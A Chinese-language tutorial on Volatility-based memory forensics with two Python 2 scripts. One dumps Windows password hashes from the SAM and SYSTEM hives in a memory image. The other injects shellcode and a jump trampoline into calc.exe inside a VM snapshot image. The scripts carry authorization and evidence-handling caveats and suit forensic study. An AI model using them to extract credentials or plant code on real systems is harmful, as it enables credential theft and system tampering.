Python 自动化内存取证

Volatility是一个开源的内存取证框架,用于分析和提取计算机内存中的信息。它主要用于计算机取证、恶意代码分析、漏洞研究和系统故障排查等领域。Volatility提供了一系列工具和库,帮助安全研究人员和取证专家分析和还原计算机系统的状态。

如下代码使用Python的Volatility框架（示例基于2.3.1版，仅支持Python 2.7）分析内存镜像文件：先定位Windows注册表中的SAM与SYSTEM配置单元(hive)的偏移，再调用hashdump插件输出各用户账户的密码哈希。需要注意的是：该代码依赖于Volatility框架和与镜像匹配的profile，并且必须提供正确的内存镜像文件；此外，输出的哈希属于凭据材料，只应在获得授权的取证或测试场景中提取，输出结果也应妥善保管，不要写入共享日志。

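import sys
import struct

# Memory image to analyse.  Volatility only reads it here, but treat it as
# evidence anyway: work from a hashed copy, never the original acquisition.
memory_file = "WinXPenSP3-Snapshot8.vmem"

# Volatility 2.3.1 checkout (Python 2 only).  It is added to the module path
# right before anything from the ``volatility`` package is imported.
VOLATILITY_PATH = "C:\\Python27\\volatility-2.3.1"

# Profile must match the image.  NOTE(review): the injection script on this
# page uses "WinXPSP3x86" for the same image; check which spelling your
# Volatility build lists under ``vol.py --info`` before trusting this one.
PROFILE = "WinXPenSP3x86"


def load_volatility(image_path, profile):
    """Import Volatility and return a ``ConfObject`` pointed at *image_path*.

    The import/registration order mirrors the original listing: plugins are
    imported, the config object is created, then the command and address-space
    global options are registered on it.

    :param image_path: path to the raw memory image.
    :param profile: Volatility profile name for the image.
    :returns: the configured ``volatility.conf.ConfObject``.
    """
    sys.path.append(VOLATILITY_PATH)

    import volatility.conf as conf
    import volatility.registry as registry

    registry.PluginImporter()
    config = conf.ConfObject()

    import volatility.commands as commands
    import volatility.addrspace as addrspace

    config.parse_options()
    config.PROFILE = profile
    # The original listing assigned ``config.LOCALTION`` (a typo), so the image
    # path never reached Volatility.  ``LOCATION`` is the real option name.
    config.LOCATION = "file://%s" % image_path

    registry.register_global_options(config, commands.Command)
    registry.register_global_options(config, addrspace.BaseAddressSpace)
    return config


def find_hive_offsets(all_offsets):
    """Return ``(sam_offset, system_offset)`` from a hive offset -> name map.

    Each hive is reported on stdout as it is found; the scan stops as soon as
    both have been seen.  A hive that is not present comes back as ``None``.

    :param all_offsets: mapping of virtual offset -> hive path, as populated by
        ``RegistryApi.all_offsets``.
    """
    sam_offset = None
    sys_offset = None
    for offset, name in all_offsets.items():
        if name.endswith("\\SAM"):
            sam_offset = offset
            print("[*] SAM: 0x%08x" % offset)
        elif name.endswith("\\system"):
            sys_offset = offset
            print("[*] System: 0x%08x" % offset)
        if sam_offset is not None and sys_offset is not None:
            break
    return sam_offset, sys_offset


def main():
    """Locate the SAM/SYSTEM hives and print what the HashDump plugin yields.

    Returns a process exit code (0 on success, 1 if a hive was not found).
    The printed entries are account password hashes, i.e. credential
    material -- do not redirect them into shared logs or tickets.
    """
    config = load_volatility(memory_file, PROFILE)

    # Plugin imports happen after the global options are registered, as in
    # the original listing.
    from volatility.plugins.registry.registryapi import RegistryApi
    from volatility.plugins.registry.lsadump import HashDump

    # Named ``reg_api`` rather than ``registry`` so the Volatility module of
    # that name is not shadowed.
    reg_api = RegistryApi(config)
    reg_api.populate_offsets()

    sam_offset, sys_offset = find_hive_offsets(reg_api.all_offsets)
    if sam_offset is None or sys_offset is None:
        print("[*] Failed to find the system or SAM offsets.")
        return 1

    # HashDump reads the hive offsets back from the config object.
    config.sys_offset = sys_offset
    config.sam_offset = sam_offset
    for entry in HashDump(config).calculate():
        print(entry)
    return 0


if __name__ == "__main__":
    sys.exit(main())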

如下这段代码使用Volatility框架在指定的内存镜像中查找进程calc.exe，在其映射页中寻找一段足够长的零字节空闲区域写入shellcode，并在calc.exe的一个固定地址处写入跳转到该shellcode的trampoline。需要注意的是：脚本以读写方式直接修改镜像文件本身（而不是运行中的进程），因此务必在镜像副本上操作，并保留原始镜像及其哈希值以保证取证完整性；同时它注入的是可执行代码，只应在受控的实验环境中使用。

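import sys
import struct

# Virtual address inside calc.exe that the trampoline overwrites.  Presumably
# the routine reached when the "=" button is pressed; it is hard-coded for one
# specific calc.exe build, so verify it against the binary in your image.
equals_button = 0x01005D51

# The image is modified IN PLACE below (opened "r+b").  Never point this at an
# evidence image: copy it first and hash the copy before and after.
memory_file = "WinXPenSP3-Snapshot8.vmem"
shellcode_file = "cmeasure.bin"

# Volatility 2.3.1 checkout (Python 2 only) and the profile for the image.
VOLATILITY_PATH = "C:\\Python27\\volatility-2.3.1"
PROFILE = "WinXPSP3x86"

# Bytes written at ``equals_button``: ``mov ebx, imm32`` (5) + ``jmp ebx`` (2).
TRAMPOLINE_SIZE = 7


def load_volatility(image_path, profile):
    """Import Volatility and return a ``ConfObject`` pointed at *image_path*.

    Keeps the original listing's import order (plugins, config, then the
    commands/addrspace modules).

    :param image_path: path to the raw memory image.
    :param profile: Volatility profile name for the image.
    :returns: the configured ``volatility.conf.ConfObject``.
    """
    sys.path.append(VOLATILITY_PATH)

    import volatility.conf as conf
    import volatility.registry as registry

    registry.PluginImporter()
    config = conf.ConfObject()

    import volatility.commands as commands  # noqa: F401 -- imported as in the original
    import volatility.addrspace as addrspace  # noqa: F401

    config.parse_options()
    config.PROFILE = profile
    # The original listing assigned ``config.LOCALTION`` (a typo), so the image
    # path never reached Volatility.  ``LOCATION`` is the real option name.
    config.LOCATION = "file://%s" % image_path
    return config


def read_shellcode(path):
    """Return the raw bytes of the shellcode file (binary mode, no translation)."""
    with open(path, "rb") as fh:
        return fh.read()


def build_trampoline(target):
    """Return the 7-byte x86 stub ``mov ebx, target ; jmp ebx``.

    :param target: 32-bit virtual address the stub jumps to (packed
        little-endian).
    """
    return b"\xbb" + struct.pack("<L", target) + b"\xff\xe3"


def find_zero_run(image, physical, size, virtual, needed):
    """Search one mapped page for ``needed`` consecutive NUL bytes.

    :param image: open binary file object for the memory image.
    :param physical: physical (file) offset of the page.
    :param size: page size in bytes.
    :param virtual: virtual address of the page in the process.
    :param needed: length of the zero run required.
    :returns: ``(virtual, physical)`` of the start of the run, or ``None``.
    """
    image.seek(physical)
    buf = image.read(size)
    try:
        idx = buf.index(b"\x00" * needed)
    except ValueError:
        # No run in this page.  The original used a bare ``except: pass``,
        # which also hid I/O errors; only the "not found" case is expected.
        return None
    return virtual + idx, physical + idx


def find_injection_points(address_space, image_path, shellcode_len, target):
    """Locate where the shellcode and the trampoline will be written.

    Walks the process's mapped pages once.  The image is only READ here;
    nothing is modified until both locations are known.

    :param address_space: process address space exposing
        ``get_available_pages()`` (yielding ``(virtual, size)``) and ``vtop()``.
    :param image_path: path to the memory image.
    :param shellcode_len: number of zero bytes needed for the shellcode.
    :param target: virtual address the trampoline must be written at.
    :returns: ``(slack, trampoline)`` -- ``slack`` is ``(virtual, physical)`` of
        the zero run, ``trampoline`` is the physical offset of *target*; either
        is ``None`` when not found.
    """
    slack = None
    trampoline = None
    with open(image_path, "rb") as image:
        for virtual, size in address_space.get_available_pages():
            physical = address_space.vtop(virtual)
            if physical is None:
                continue

            if slack is None:
                slack = find_zero_run(image, physical, size, virtual, shellcode_len)
                if slack is not None:
                    print("[*] Found good shellcode location!")
                    print("[*] Virtual address: 0x%08x" % slack[0])
                    print("[*] Physical address: 0x%08x" % slack[1])

            # The target must lie in this page with room for the whole stub.
            if trampoline is None and virtual <= target < (virtual + size) - TRAMPOLINE_SIZE:
                # The original wrote ``v_offset = equals_button = page[0]``
                # (an assignment, not a subtraction), which clobbered the
                # target and produced a bogus physical offset.
                trampoline = physical + (target - virtual)
                print("[*] Found our trampoline target at: 0x%08x" % trampoline)

            if slack is not None and trampoline is not None:
                break
    return slack, trampoline


def inject(image_path, shellcode, slack, trampoline):
    """Write *shellcode* into the slack run and the trampoline over the target.

    Opens the image read/write in binary mode -- the original used text mode
    ``"r+"``, which is unsafe for binary data on Windows.

    :param image_path: path to the memory image (modified in place).
    :param shellcode: bytes to plant.
    :param slack: ``(virtual, physical)`` of the zero run.
    :param trampoline: physical offset at which the 7-byte stub is written.
    """
    with open(image_path, "r+b") as image:
        image.seek(slack[1])
        image.write(shellcode)
        image.seek(trampoline)
        image.write(build_trampoline(slack[0]))


def main():
    """Find calc.exe in the image and plant the shellcode plus trampoline.

    Returns a process exit code: 0 after a successful injection, 1 when the
    shellcode is empty, calc.exe is absent, or no suitable locations exist
    (in which case the image is left untouched).
    """
    sc = read_shellcode(shellcode_file)
    if not sc:
        # An empty payload would match a zero-length run at offset 0 and
        # "inject" nothing while still patching the trampoline.
        print("[!] %s is empty; nothing to inject." % shellcode_file)
        return 1

    config = load_volatility(memory_file, PROFILE)
    import volatility.plugins.taskmods as taskmods

    for process in taskmods.PSList(config).calculate():
        if str(process.ImageFileName) != "calc.exe":
            continue
        print("[*] Found calc.exe with PID %d" % process.UniqueProcessId)
        print("[*] Hunting for physical offsets...please wait.")

        address_space = process.get_process_address_space()
        slack, trampoline = find_injection_points(
            address_space, memory_file, len(sc), equals_button)
        if slack is None or trampoline is None:
            print("[*] Could not find both a shellcode location and the "
                  "trampoline target; image left untouched.")
            return 1

        print("[*] Injecting shellcode.")
        print("[*] Writing trampoline...")
        inject(memory_file, sc, slack, trampoline)
        print("[*] Done injecting code.")
        # Stop after the first calc.exe: the original kept looping and reused
        # the first process's slack address for any later calc.exe, and its
        # final write referenced an undefined ``f``.
        return 0

    print("[*] calc.exe not found in the image.")
    return 1


if __name__ == "__main__":
    sys.exit(main())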